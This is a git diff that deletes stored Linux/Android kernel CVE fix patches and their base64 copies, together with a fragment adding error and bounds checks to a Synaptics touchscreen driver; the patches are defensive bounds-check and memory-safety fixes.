-@@ -2487,12 +2493,16 @@ static int synaptics_rmi4_f01_init(struct synaptics_rmi4_data *rmi4_data,
- 		struct synaptics_rmi4_fn_desc *fd,
- 		unsigned int intr_count)
- {
-+	int retval;
-+
- 	fhandler->fn_number = fd->fn_number;
- 	fhandler->num_of_data_sources = fd->intr_src_count;
- 	fhandler->data = NULL;
- 	fhandler->extra = NULL;
- 
--	synaptics_rmi4_set_intr_mask(fhandler, fd, intr_count);
-+	retval = synaptics_rmi4_set_intr_mask(fhandler, fd, intr_count);
-+	if (retval < 0)
-+		return retval;
- 
- 	rmi4_data->f01_query_base_addr = fd->query_base_addr;
- 	rmi4_data->f01_ctrl_base_addr = fd->ctrl_base_addr;
-@@ -2578,7 +2588,9 @@ static int synaptics_rmi4_f11_init(struct synaptics_rmi4_data *rmi4_data,
- 		rmi4_data->sensor_max_y = temp;
- 	}
- 
--	synaptics_rmi4_set_intr_mask(fhandler, fd, intr_count);
-+	retval = synaptics_rmi4_set_intr_mask(fhandler, fd, intr_count);
-+	if (retval < 0)
-+		return retval;
- 
- 	fhandler->data = NULL;
- 
-@@ -3362,7 +3374,9 @@ static int synaptics_rmi4_f12_init(struct synaptics_rmi4_data *rmi4_data,
- 			return retval;
- 	}
- 
--	synaptics_rmi4_set_intr_mask(fhandler, fd, intr_count);
-+	retval = synaptics_rmi4_set_intr_mask(fhandler, fd, intr_count);
-+	if (retval < 0)
-+		return retval;
- 
- 	/* Allocate memory for finger data storage space */
- 	fhandler->data_size = num_of_fingers * size_of_2d_data;
-@@ -3569,7 +3583,9 @@ static int synaptics_rmi4_f1a_init(struct synaptics_rmi4_data *rmi4_data,
- 	fhandler->fn_number = fd->fn_number;
- 	fhandler->num_of_data_sources = fd->intr_src_count;
- 
--	synaptics_rmi4_set_intr_mask(fhandler, fd, intr_count);
-+	retval = synaptics_rmi4_set_intr_mask(fhandler, fd, intr_count);
-+	if (retval < 0)
-+		return retval;
- 
- 	retval = synaptics_rmi4_f1a_alloc_mem(rmi4_data, fhandler);
- 	if (retval < 0)
-@@ -3596,12 +3612,16 @@ static int synaptics_rmi4_f34_init(struct synaptics_rmi4_data *rmi4_data,
- 		unsigned int intr_count,
- 		unsigned int page_number)
- {
-+	int retval;
-+
- 	fhandler->fn_number = fd->fn_number;
- 	fhandler->num_of_data_sources = fd->intr_src_count;
- 	fhandler->data = NULL;
- 	fhandler->extra = NULL;
- 
--	synaptics_rmi4_set_intr_mask(fhandler, fd, intr_count);
-+	retval = synaptics_rmi4_set_intr_mask(fhandler, fd, intr_count);
-+	if (retval < 0)
-+		return retval;
- 
- 	rmi4_data->f34_query_base_addr =
- 		(fd->query_base_addr | (page_number << 8));
-@@ -3634,7 +3654,9 @@ static int synaptics_rmi4_f54_init(struct synaptics_rmi4_data *rmi4_data,
- 	fhandler->data = NULL;
- 	fhandler->extra = NULL;
- 
--	synaptics_rmi4_set_intr_mask(fhandler, fd, intr_count);
-+	retval = synaptics_rmi4_set_intr_mask(fhandler, fd, intr_count);
-+	if (retval < 0)
-+		return retval;
- 
- 	rmi4_data->f54_query_base_addr =
- 		(fd->query_base_addr | (page_number << 8));
-@@ -4127,8 +4149,10 @@ static int synaptics_rmi4_query_device(struct synaptics_rmi4_data *rmi4_data)
- 				fhandler->fn_number = rmi_fd.fn_number;
- 				fhandler->num_of_data_sources =
- 						rmi_fd.intr_src_count;
--				synaptics_rmi4_set_intr_mask(fhandler, &rmi_fd,
--						intr_count);
-+				retval = synaptics_rmi4_set_intr_mask(
-+						fhandler, &rmi_fd, intr_count);
-+				if (retval < 0)
-+					return retval;
- #endif
- 
- #ifdef F51_DISCRETE_FORCE
-@@ -4171,6 +4195,8 @@ static int synaptics_rmi4_query_device(struct synaptics_rmi4_data *rmi4_data)
- 	dev_dbg(rmi4_data->pdev->dev.parent,
- 			"%s: Number of interrupt registers = %d\n",
- 			__func__, rmi4_data->num_of_intr_regs);
-+	if (rmi4_data->num_of_intr_regs > MAX_INTR_REGISTERS)
-+		return -EINVAL;
- 
- 	f01_query = kmalloc(F01_STD_QUERY_LEN, GFP_KERNEL);
- 	if (!f01_query) {
diff --git a/Patches/Linux_CVEs/CVE-2017-0651/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-0651/ANY/0001.patch
deleted file mode 100644
index 52fd8ec8..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0651/ANY/0001.patch
+++ /dev/null
@@ -1,26 +0,0 @@
-diff --git a/drivers/staging/android/ion/ion.c b/drivers/staging/android/ion/ion.c
-index b4ef711..9a8000e 100644
---- a/drivers/staging/android/ion/ion.c
-+++ b/drivers/staging/android/ion/ion.c
-@@ -871,6 +871,7 @@
- 	struct ion_device *dev = p->dev;
- 	struct rb_node *n;
- 	struct ion_debugfs_handle_header header;
-+	struct ion_debugfs_handle_entry entry;
- 
- 	header.version = 1;
- 	/*
-@@ -883,11 +884,12 @@
- 	if (seq_write(s, &header, sizeof(header)))
- 		return 0;
- 
-+	memset(&entry, 0, sizeof(entry));
-+
- 	mutex_lock(&dev->buffer_lock);
- 	for (n = rb_first(&dev->buffers); n; n = rb_next(n)) {
- 		struct ion_buffer *buffer = rb_entry(n, struct ion_buffer,
- 				node);
--		struct ion_debugfs_handle_entry entry;
- 
- 		if (buffer->pid != p->pid)
- 			continue;
diff --git a/Patches/Linux_CVEs/CVE-2017-0651/ANY/0001.patch.base64 b/Patches/Linux_CVEs/CVE-2017-0651/ANY/0001.patch.base64
deleted file mode 100644
index e2fc1695..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0651/ANY/0001.patch.base64
+++ /dev/null
@@ -1 +0,0 @@
-ZGlmZiAtLWdpdCBhL2RyaXZlcnMvc3RhZ2luZy9hbmRyb2lkL2lvbi9pb24uYyBiL2RyaXZlcnMvc3RhZ2luZy9hbmRyb2lkL2lvbi9pb24uYwppbmRleCBiNGVmNzExLi45YTgwMDBlIDEwMDY0NAotLS0gYS9kcml2ZXJzL3N0YWdpbmcvYW5kcm9pZC9pb24vaW9uLmMKKysrIGIvZHJpdmVycy9zdGFnaW5nL2FuZHJvaWQvaW9uL2lvbi5jCkBAIC04NzEsNiArODcxLDcgQEAKIAlzdHJ1Y3QgaW9uX2RldmljZSAqZGV2ID0gcC0+ZGV2OwogCXN0cnVjdCByYl9ub2RlICpuOwogCXN0cnVjdCBpb25fZGVidWdmc19oYW5kbGVfaGVhZGVyIGhlYWRlcjsKKwlzdHJ1Y3QgaW9uX2RlYnVnZnNfaGFuZGxlX2VudHJ5IGVudHJ5OwogCiAJaGVhZGVyLnZlcnNpb24gPSAxOwogCS8qCkBAIC04ODMsMTEgKzg4NCwxMiBAQAogCWlmIChzZXFfd3JpdGUocywgJmhlYWRlciwgc2l6ZW9mKGhlYWRlcikpKQogCQlyZXR1cm4gMDsKIAorCW1lbXNldCgmZW50cnksIDAsIHNpemVvZihlbnRyeSkpOworCiAJbXV0ZXhfbG9jaygmZGV2LT5idWZmZXJfbG9jayk7CiAJZm9yIChuID0gcmJfZmlyc3QoJmRldi0+YnVmZmVycyk7IG47IG4gPSByYl9uZXh0KG4pKSB7CiAJCXN0cnVjdCBpb25fYnVmZmVyICpidWZmZXIgPSByYl9lbnRyeShuLCBzdHJ1Y3QgaW9uX2J1ZmZlciwKIAkJCQlub2RlKTsKLQkJc3RydWN0IGlvbl9kZWJ1Z2ZzX2hhbmRsZV9lbnRyeSBlbnRyeTsKIAogCQlpZiAoYnVmZmVyLT5waWQgIT0gcC0+cGlkKQogCQkJY29udGludWU7Cg==
\ No newline at end of file
diff --git a/Patches/Linux_CVEs/CVE-2017-0705/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-0705/ANY/0001.patch
deleted file mode 100644
index 9b38b46d..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0705/ANY/0001.patch
+++ /dev/null
@@ -1,84 +0,0 @@
-From e58dd312d3d28331b2e28674c6a49f815a55d4bc Mon Sep 17 00:00:00 2001
-From: Insun Song <insun.song@broadcom.com>
-Date: Fri, 21 Apr 2017 14:38:21 -0700
-Subject: [PATCH] net: wireless: bcmdhd: adding boundary check in SWC gscan
- config
-
-Since there's no boundary checking while looping NL structures, it could
-corrupt kernel memory heap and leave room for security vulnerability
-issue.
-The proposed fix is adding a new NL attribute indicating how many SWC
-bssids included. and it bounds NL iteration not to overwrite the
-buffer.
-
-Signed-off-by: Insun Song <insun.song@broadcom.com>
-Bug: 34973477
-Change-Id: I03e079b6054b930487230ca313bb96a7f9e63e64
----
- drivers/net/wireless/bcmdhd/wl_cfgvendor.c | 34 +++++++++++++++++++++++++++---
- 1 file changed, 31 insertions(+), 3 deletions(-)
-
-diff --git a/drivers/net/wireless/bcmdhd/wl_cfgvendor.c b/drivers/net/wireless/bcmdhd/wl_cfgvendor.c
-index 1f5152f66ab36..4e5fee09b5f33 100644
---- a/drivers/net/wireless/bcmdhd/wl_cfgvendor.c
-+++ b/drivers/net/wireless/bcmdhd/wl_cfgvendor.c
-@@ -1168,11 +1168,15 @@ static int wl_cfgvendor_significant_change_cfg(struct wiphy *wiphy,
- 	const struct nlattr *outer, *inner, *iter;
- 	bool flush = FALSE;
- 	wl_pfn_significant_bssid_t *pbssid;
-+	uint16 num_bssid = 0;
-+	uint16 max_buf_size = sizeof(gscan_swc_params_t) +
-+		sizeof(wl_pfn_significant_bssid_t) * (PFN_SWC_MAX_NUM_APS - 1);
-+
-+	significant_params = kzalloc(max_buf_size, GFP_KERNEL);
- 
--	significant_params = (gscan_swc_params_t *) kzalloc(len, GFP_KERNEL);
- 	if (!significant_params) {
--		WL_ERR(("Cannot Malloc mem to parse config commands size - %d bytes \n", len));
--		return -1;
-+		WL_ERR(("Cannot Malloc mem size:%d\n", len));
-+		return BCME_NOMEM;
- 	}
- 
- 
-@@ -1192,9 +1196,27 @@ static int wl_cfgvendor_significant_change_cfg(struct wiphy *wiphy,
- 			case GSCAN_ATTRIBUTE_MIN_BREACHING:
- 				significant_params->swc_threshold = nla_get_u16(iter);
- 				break;
-+			case GSCAN_ATTRIBUTE_NUM_BSSID:
-+				num_bssid = nla_get_u16(iter);
-+				if (num_bssid > PFN_SWC_MAX_NUM_APS) {
-+					WL_ERR(("ovar max SWC bssids:%d\n",
-+						num_bssid));
-+					err = BCME_BADARG;
-+					goto exit;
-+				}
-+				break;
- 			case GSCAN_ATTRIBUTE_SIGNIFICANT_CHANGE_BSSIDS:
-+				if (num_bssid == 0) {
-+					WL_ERR(("num_bssid : 0\n"));
-+					err = BCME_BADARG;
-+					goto exit;
-+				}
- 				pbssid = significant_params->bssid_elem_list;
- 				nla_for_each_nested(outer, iter, tmp) {
-+					if (j >= num_bssid) {
-+						j++;
-+						break;
-+					}
- 					nla_for_each_nested(inner, outer, tmp1) {
- 							switch (nla_type(inner)) {
- 								case GSCAN_ATTRIBUTE_BSSID:
-@@ -1217,6 +1239,12 @@ static int wl_cfgvendor_significant_change_cfg(struct wiphy *wiphy,
- 				break;
- 		}
- 	}
-+	if (j != num_bssid) {
-+		WL_ERR(("swc bssids count:%d not matched to num_bssid:%d\n",
-+			j, num_bssid));
-+		err = BCME_BADARG;
-+		goto exit;
-+	}
- 	significant_params->nbssid = j;
- 
- 	if (dhd_dev_pno_set_cfg_gscan(bcmcfg_to_prmry_ndev(cfg),
diff --git a/Patches/Linux_CVEs/CVE-2017-0706/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-0706/ANY/0001.patch
deleted file mode 100644
index f5da5679..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0706/ANY/0001.patch
+++ /dev/null
@@ -1,15 +0,0 @@
-diff --git a/drivers/net/wireless/bcmdhd/wl_cfg80211.c b/drivers/net/wireless/bcmdhd/wl_cfg80211.c
-index 9081988..a73b030 100644
---- a/drivers/net/wireless/bcmdhd/wl_cfg80211.c
-+++ b/drivers/net/wireless/bcmdhd/wl_cfg80211.c
-@@ -5830,6 +5830,10 @@
- 
- 	WL_DBG(("Enter \n"));
- 
-+	if (len > (ACTION_FRAME_SIZE + DOT11_MGMT_HDR_LEN)) {
-+		WL_ERR(("bad length:%zu\n", len));
-+		return BCME_BADARG;
-+	}
- 	dev = cfgdev_to_wlc_ndev(cfgdev, cfg);
- 
- 	/* set bsscfg idx for iovar (wlan0: P2PAPI_BSSCFG_PRIMARY, p2p: P2PAPI_BSSCFG_DEVICE)	*/
diff --git a/Patches/Linux_CVEs/CVE-2017-0706/ANY/0001.patch.base64 b/Patches/Linux_CVEs/CVE-2017-0706/ANY/0001.patch.base64
deleted file mode 100644
index ad2489f5..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0706/ANY/0001.patch.base64
+++ /dev/null
@@ -1 +0,0 @@
-ZGlmZiAtLWdpdCBhL2RyaXZlcnMvbmV0L3dpcmVsZXNzL2JjbWRoZC93bF9jZmc4MDIxMS5jIGIvZHJpdmVycy9uZXQvd2lyZWxlc3MvYmNtZGhkL3dsX2NmZzgwMjExLmMKaW5kZXggOTA4MTk4OC4uYTczYjAzMCAxMDA2NDQKLS0tIGEvZHJpdmVycy9uZXQvd2lyZWxlc3MvYmNtZGhkL3dsX2NmZzgwMjExLmMKKysrIGIvZHJpdmVycy9uZXQvd2lyZWxlc3MvYmNtZGhkL3dsX2NmZzgwMjExLmMKQEAgLTU4MzAsNiArNTgzMCwxMCBAQAogCiAJV0xfREJHKCgiRW50ZXIgXG4iKSk7CiAKKwlpZiAobGVuID4gKEFDVElPTl9GUkFNRV9TSVpFICsgRE9UMTFfTUdNVF9IRFJfTEVOKSkgeworCQlXTF9FUlIoKCJiYWQgbGVuZ3RoOiV6dVxuIiwgbGVuKSk7CisJCXJldHVybiBCQ01FX0JBREFSRzsKKwl9CiAJZGV2ID0gY2ZnZGV2X3RvX3dsY19uZGV2KGNmZ2RldiwgY2ZnKTsKIAogCS8qIHNldCBic3NjZmcgaWR4IGZvciBpb3ZhciAod2xhbjA6IFAyUEFQSV9CU1NDRkdfUFJJTUFSWSwgcDJwOiBQMlBBUElfQlNTQ0ZHX0RFVklDRSkJKi8K
\ No newline at end of file
diff --git a/Patches/Linux_CVEs/CVE-2017-0710/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-0710/ANY/0001.patch
deleted file mode 100644
index b1a9e523..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0710/ANY/0001.patch
+++ /dev/null
@@ -1,14 +0,0 @@
-diff --git a/kernel/fork.c b/kernel/fork.c
-index 2b11e38..b6eecda 100644
---- a/kernel/fork.c
-+++ b/kernel/fork.c
-@@ -725,8 +725,7 @@
- 
- 	mm = get_task_mm(task);
- 	if (mm && mm != current->mm &&
--			!ptrace_may_access(task, mode) &&
--			!capable(CAP_SYS_RESOURCE)) {
-+			!ptrace_may_access(task, mode)) {
- 		mmput(mm);
- 		mm = ERR_PTR(-EACCES);
- 	}
diff --git a/Patches/Linux_CVEs/CVE-2017-0710/ANY/0001.patch.base64 b/Patches/Linux_CVEs/CVE-2017-0710/ANY/0001.patch.base64
deleted file mode 100644
index 9f795347..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0710/ANY/0001.patch.base64
+++ /dev/null
@@ -1 +0,0 @@
-ZGlmZiAtLWdpdCBhL2tlcm5lbC9mb3JrLmMgYi9rZXJuZWwvZm9yay5jCmluZGV4IDJiMTFlMzguLmI2ZWVjZGEgMTAwNjQ0Ci0tLSBhL2tlcm5lbC9mb3JrLmMKKysrIGIva2VybmVsL2ZvcmsuYwpAQCAtNzI1LDggKzcyNSw3IEBACiAKIAltbSA9IGdldF90YXNrX21tKHRhc2spOwogCWlmIChtbSAmJiBtbSAhPSBjdXJyZW50LT5tbSAmJgotCQkJIXB0cmFjZV9tYXlfYWNjZXNzKHRhc2ssIG1vZGUpICYmCi0JCQkhY2FwYWJsZShDQVBfU1lTX1JFU09VUkNFKSkgeworCQkJIXB0cmFjZV9tYXlfYWNjZXNzKHRhc2ssIG1vZGUpKSB7CiAJCW1tcHV0KG1tKTsKIAkJbW0gPSBFUlJfUFRSKC1FQUNDRVMpOwogCX0K
\ No newline at end of file
diff --git a/Patches/Linux_CVEs/CVE-2017-0740/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-0740/ANY/0001.patch
deleted file mode 100644
index a379087a..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0740/ANY/0001.patch
+++ /dev/null
@@ -1,110 +0,0 @@
-From e7fdc1ca00f1e589df8542af7e7acaaa87370625 Mon Sep 17 00:00:00 2001
-From: Insun Song <insun.song@broadcom.com>
-Date: Fri, 7 Apr 2017 16:27:49 -0700
-Subject: [PATCH] net: wireless: bcmdhd: additional length check for BRCM EVENT
- frame.
-
-This is just for exceptional case where user has updated kernel to the
-latest, but still used non-patched firmware. The non-patched firmware
-could deliver ETHER_TYPE_BRCM packet to host.
-
-If attacker inject packet with its header length forged, it could bypass
-current host driver's length check routine and cause memory corruption.
-
-Proposed fix is enhancing length check to validate its header length.
-
-Change-Id: I90fc5101bddfd1d427e0a52758ddf8bc16577555
-Bug: 37168488
-Signed-off-by: Insun Song <insun.song@broadcom.com>
----
- drivers/net/wireless/bcmdhd/bcmevent.c             | 27 ++++++++++++++--------
- drivers/net/wireless/bcmdhd/include/proto/bcmeth.h |  1 +
- 2 files changed, 18 insertions(+), 10 deletions(-)
- mode change 100755 => 100644 drivers/net/wireless/bcmdhd/include/proto/bcmeth.h
-
-diff --git a/drivers/net/wireless/bcmdhd/bcmevent.c b/drivers/net/wireless/bcmdhd/bcmevent.c
-index b85f111bce180..7ed9739c0eddf 100644
---- a/drivers/net/wireless/bcmdhd/bcmevent.c
-+++ b/drivers/net/wireless/bcmdhd/bcmevent.c
-@@ -209,12 +209,14 @@ int
- is_wlc_event_frame(void *pktdata, uint pktlen, uint16 exp_usr_subtype,
- 	bcm_event_msg_u_t *out_event)
- {
--	uint16 len;
-+	uint16 evlen;
- 	uint16 subtype;
- 	uint16 usr_subtype;
- 	bcm_event_t *bcm_event;
- 	uint8 *pktend;
-+	uint8 *evend;
- 	int err = BCME_OK;
-+	uint32 data_len;
- 
- 	pktend = (uint8 *)pktdata + pktlen;
- 	bcm_event = (bcm_event_t *)pktdata;
-@@ -235,8 +237,9 @@ is_wlc_event_frame(void *pktdata, uint pktlen, uint16 exp_usr_subtype,
- 	}
- 
- 	/* check length in bcmeth_hdr */
--	len = ntoh16_ua((void *)&bcm_event->bcm_hdr.length);
--	if (((uint8 *)&bcm_event->bcm_hdr.version + len) > pktend) {
-+	evlen = ntoh16_ua((void *)&bcm_event->bcm_hdr.length);
-+	evend = (uint8 *)&bcm_event->bcm_hdr.version + evlen;
-+	if (evend != pktend) {
- 		err = BCME_BADLEN;
- 		goto done;
- 	}
-@@ -257,13 +260,15 @@ is_wlc_event_frame(void *pktdata, uint pktlen, uint16 exp_usr_subtype,
- 	usr_subtype = ntoh16_ua((void *)&bcm_event->bcm_hdr.usr_subtype);
- 	switch (usr_subtype) {
- 	case BCMILCP_BCM_SUBTYPE_EVENT:
--		if (pktlen < sizeof(bcm_event_t)) {
-+		if ((pktlen < sizeof(bcm_event_t)) ||
-+		    (evend < ((uint8 *)bcm_event + sizeof(bcm_event_t)))) {
- 			err = BCME_BADLEN;
- 			goto done;
- 		}
- 
--		len = sizeof(bcm_event_t) + ntoh32_ua((void *)&bcm_event->event.datalen);
--		if ((uint8 *)pktdata + len > pktend) {
-+		data_len = ntoh32_ua((void *)&bcm_event->event.datalen);
-+		if ((sizeof(bcm_event_t) + data_len +
-+			BCMILCP_BCM_SUBTYPE_EVENT_DATA_PAD) != pktlen) {
- 			err = BCME_BADLEN;
- 			goto done;
- 		}
-@@ -280,14 +285,16 @@ is_wlc_event_frame(void *pktdata, uint pktlen, uint16 exp_usr_subtype,
- 
- 		break;
- 	case BCMILCP_BCM_SUBTYPE_DNGLEVENT:
--		if (pktlen < sizeof(bcm_dngl_event_t)) {
-+		if (pktlen < sizeof(bcm_dngl_event_t) ||
-+		    (evend < ((uint8 *)bcm_event + sizeof(bcm_dngl_event_t)))) {
- 			err = BCME_BADLEN;
- 			goto done;
- 		}
- 
--		len = sizeof(bcm_dngl_event_t) +
--			ntoh16_ua((void *)&((bcm_dngl_event_t *)pktdata)->dngl_event.datalen);
--		if ((uint8 *)pktdata + len > pktend) {
-+		data_len = ntoh16_ua((void *)&((bcm_dngl_event_t *)pktdata)
-+				->dngl_event.datalen);
-+		if ((sizeof(bcm_dngl_event_t) + data_len +
-+			BCMILCP_BCM_SUBTYPE_EVENT_DATA_PAD) != pktlen) {
- 			err = BCME_BADLEN;
- 			goto done;
- 		}
-diff --git a/drivers/net/wireless/bcmdhd/include/proto/bcmeth.h b/drivers/net/wireless/bcmdhd/include/proto/bcmeth.h
-old mode 100755
-new mode 100644
-index 41c1b57443c77..756f594bc61db
---- a/drivers/net/wireless/bcmdhd/include/proto/bcmeth.h
-+++ b/drivers/net/wireless/bcmdhd/include/proto/bcmeth.h
-@@ -93,6 +93,7 @@
- #define BCMILCP_BCM_SUBTYPE_DNGLEVENT		5
- #define BCMILCP_BCM_SUBTYPEHDR_MINLENGTH	8
- #define BCMILCP_BCM_SUBTYPEHDR_VERSION		0
-+#define BCMILCP_BCM_SUBTYPE_EVENT_DATA_PAD	2
- 
- /* These fields are stored in network order */
- typedef BWL_PRE_PACKED_STRUCT struct bcmeth_hdr
diff --git a/Patches/Linux_CVEs/CVE-2017-0744/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-0744/ANY/0001.patch
deleted file mode 100644
index 3c5aa2b2..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0744/ANY/0001.patch
+++ /dev/null
@@ -1,30 +0,0 @@
-diff --git a/sound/soc/tegra/tegra30_avp.c b/sound/soc/tegra/tegra30_avp.c
-index 1a8c304..ef0616f 100644
---- a/sound/soc/tegra/tegra30_avp.c
-+++ b/sound/soc/tegra/tegra30_avp.c
-@@ -276,7 +276,7 @@
- 	struct audio_engine_data *audio_engine;
- 	const struct firmware *ucode_fw;
- 	const struct tegra30_avp_ucode_desc *ucode_desc;
--	int ucode_size = 0, ucode_offset = 0, total_ucode_size = 0;
-+	ssize_t ucode_size = 0, ucode_offset = 0, total_ucode_size = 0;
- 	int i, ret = 0;
- 
- 	dev_vdbg(audio_avp->dev, "%s", __func__);
-@@ -316,13 +316,14 @@
- 		}
- 
- 		ucode_size = ucode_fw->size;
--		if (ucode_size <= 0) {
-+		if (ucode_size <= 0 ||
-+			ucode_size > avp_ucode_desc[i].max_mem_size) {
- 			dev_err(audio_avp->dev, "Invalid ucode size.");
- 			ret = -EINVAL;
- 			release_firmware(ucode_fw);
- 			goto err_param_mem_free;
- 		}
--		dev_vdbg(audio_avp->dev, "%s ucode size = %d bytes",
-+		dev_vdbg(audio_avp->dev, "%s ucode size = %zd bytes",
- 			ucode_desc->bin_name, ucode_size);
- 
- 		/* Read ucode */
diff --git a/Patches/Linux_CVEs/CVE-2017-0744/ANY/0001.patch.base64 b/Patches/Linux_CVEs/CVE-2017-0744/ANY/0001.patch.base64
deleted file mode 100644
index 8e797830..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0744/ANY/0001.patch.base64
+++ /dev/null
@@ -1 +0,0 @@
-ZGlmZiAtLWdpdCBhL3NvdW5kL3NvYy90ZWdyYS90ZWdyYTMwX2F2cC5jIGIvc291bmQvc29jL3RlZ3JhL3RlZ3JhMzBfYXZwLmMKaW5kZXggMWE4YzMwNC4uZWYwNjE2ZiAxMDA2NDQKLS0tIGEvc291bmQvc29jL3RlZ3JhL3RlZ3JhMzBfYXZwLmMKKysrIGIvc291bmQvc29jL3RlZ3JhL3RlZ3JhMzBfYXZwLmMKQEAgLTI3Niw3ICsyNzYsNyBAQAogCXN0cnVjdCBhdWRpb19lbmdpbmVfZGF0YSAqYXVkaW9fZW5naW5lOwogCWNvbnN0IHN0cnVjdCBmaXJtd2FyZSAqdWNvZGVfZnc7CiAJY29uc3Qgc3RydWN0IHRlZ3JhMzBfYXZwX3Vjb2RlX2Rlc2MgKnVjb2RlX2Rlc2M7Ci0JaW50IHVjb2RlX3NpemUgPSAwLCB1Y29kZV9vZmZzZXQgPSAwLCB0b3RhbF91Y29kZV9zaXplID0gMDsKKwlzc2l6ZV90IHVjb2RlX3NpemUgPSAwLCB1Y29kZV9vZmZzZXQgPSAwLCB0b3RhbF91Y29kZV9zaXplID0gMDsKIAlpbnQgaSwgcmV0ID0gMDsKIAogCWRldl92ZGJnKGF1ZGlvX2F2cC0+ZGV2LCAiJXMiLCBfX2Z1bmNfXyk7CkBAIC0zMTYsMTMgKzMxNiwxNCBAQAogCQl9CiAKIAkJdWNvZGVfc2l6ZSA9IHVjb2RlX2Z3LT5zaXplOwotCQlpZiAodWNvZGVfc2l6ZSA8PSAwKSB7CisJCWlmICh1Y29kZV9zaXplIDw9IDAgfHwKKwkJCXVjb2RlX3NpemUgPiBhdnBfdWNvZGVfZGVzY1tpXS5tYXhfbWVtX3NpemUpIHsKIAkJCWRldl9lcnIoYXVkaW9fYXZwLT5kZXYsICJJbnZhbGlkIHVjb2RlIHNpemUuIik7CiAJCQlyZXQgPSAtRUlOVkFMOwogCQkJcmVsZWFzZV9maXJtd2FyZSh1Y29kZV9mdyk7CiAJCQlnb3RvIGVycl9wYXJhbV9tZW1fZnJlZTsKIAkJfQotCQlkZXZfdmRiZyhhdWRpb19hdnAtPmRldiwgIiVzIHVjb2RlIHNpemUgPSAlZCBieXRlcyIsCisJCWRldl92ZGJnKGF1ZGlvX2F2cC0+ZGV2LCAiJXMgdWNvZGUgc2l6ZSA9ICV6ZCBieXRlcyIsCiAJCQl1Y29kZV9kZXNjLT5iaW5fbmFtZSwgdWNvZGVfc2l6ZSk7CiAKIAkJLyogUmVhZCB1Y29kZSAqLwo=
\ No newline at end of file
diff --git a/Patches/Linux_CVEs/CVE-2017-0746/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-0746/ANY/0001.patch
deleted file mode 100644
index 91e061a0..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0746/ANY/0001.patch
+++ /dev/null
@@ -1,43 +0,0 @@
-From a793531b751d8c3609e2bf1a5dc2c0f10e003632 Mon Sep 17 00:00:00 2001
-From: Utkarsh Saxena <usaxena@codeaurora.org>
-Date: Tue, 25 Apr 2017 17:39:41 +0530
-Subject: [PATCH] msm: ipa: Fix for missing int overflow check in the refcount
- library
-
-Overflow of reference counter can lead to memory leak.
-
-Before incrementing the reference count, check with
-U32_MAX and return for error check.
-
-Bug: 35467471
-Change-Id: Ib96d36574ee086ec73c9836110cb2c98e8ae3d66
-Acked-by: Mohammed Javid <mjavid@qti.qualcomm.com>
-Signed-off-by: Utkarsh Saxena <usaxena@codeaurora.org>
----
- drivers/platform/msm/ipa/ipa_rt.c | 6 ++++++
- 1 file changed, 6 insertions(+)
-
-diff --git a/drivers/platform/msm/ipa/ipa_rt.c b/drivers/platform/msm/ipa/ipa_rt.c
-index 47767cdafa70f..81c6331da8a54 100644
---- a/drivers/platform/msm/ipa/ipa_rt.c
-+++ b/drivers/platform/msm/ipa/ipa_rt.c
-@@ -1289,6 +1289,10 @@ int ipa_get_rt_tbl(struct ipa_ioc_get_rt_tbl *lookup)
- 	mutex_lock(&ipa_ctx->lock);
- 	entry = __ipa_find_rt_tbl(lookup->ip, lookup->name);
- 	if (entry && entry->cookie == IPA_COOKIE) {
-+		if (entry->ref_cnt == ((u32)~0U)) {
-+			IPAERR("fail: ref count crossed limit\n");
-+			goto ret;
-+		}
- 		entry->ref_cnt++;
- 		lookup->hdl = entry->id;
- 
-@@ -1298,6 +1302,8 @@ int ipa_get_rt_tbl(struct ipa_ioc_get_rt_tbl *lookup)
- 
- 		result = 0;
- 	}
-+
-+ret:
- 	mutex_unlock(&ipa_ctx->lock);
- 
- 	return result;
diff --git a/Patches/Linux_CVEs/CVE-2017-0747/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-0747/ANY/0001.patch
deleted file mode 100644
index 01d079ae..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0747/ANY/0001.patch
+++ /dev/null
@@ -1,47 +0,0 @@
-From c0021edb9ee6b2a37322cd6cf6ebdf160d09b8d7 Mon Sep 17 00:00:00 2001
-From: Brahmaji K <bkomma@codeaurora.org>
-Date: Mon, 15 May 2017 16:02:15 +0530
-Subject: qcdev: Check the digest length during the SHA operations
-
-Check the digest length to avoid buffer overflow while
-doing the SHA operations.
-
-Change-Id: I4d3fb20723f59e905a672edaf84ee5d0865905b1
-Signed-off-by: Brahmaji K <bkomma@codeaurora.org>
----
- drivers/crypto/msm/qcedev.c | 12 ++++++++++++
- 1 file changed, 12 insertions(+)
-
-diff --git a/drivers/crypto/msm/qcedev.c b/drivers/crypto/msm/qcedev.c
-index d04ca6f..beeb99e 100644
---- a/drivers/crypto/msm/qcedev.c
-+++ b/drivers/crypto/msm/qcedev.c
-@@ -1741,6 +1741,12 @@ long qcedev_ioctl(struct file *file, unsigned cmd, unsigned long arg)
- 			mutex_unlock(&hash_access_lock);
- 			return err;
- 		}
-+		if (handle->sha_ctxt.diglen > QCEDEV_MAX_SHA_DIGEST) {
-+			pr_err("Invalid sha_ctxt.diglen %d\n",
-+					handle->sha_ctxt.diglen);
-+			mutex_unlock(&hash_access_lock);
-+			return -EINVAL;
-+		}
- 		qcedev_areq.sha_op_req.diglen = handle->sha_ctxt.diglen;
- 		memcpy(&qcedev_areq.sha_op_req.digest[0],
- 				&handle->sha_ctxt.digest[0],
-@@ -1777,6 +1783,12 @@ long qcedev_ioctl(struct file *file, unsigned cmd, unsigned long arg)
- 			mutex_unlock(&hash_access_lock);
- 			return err;
- 		}
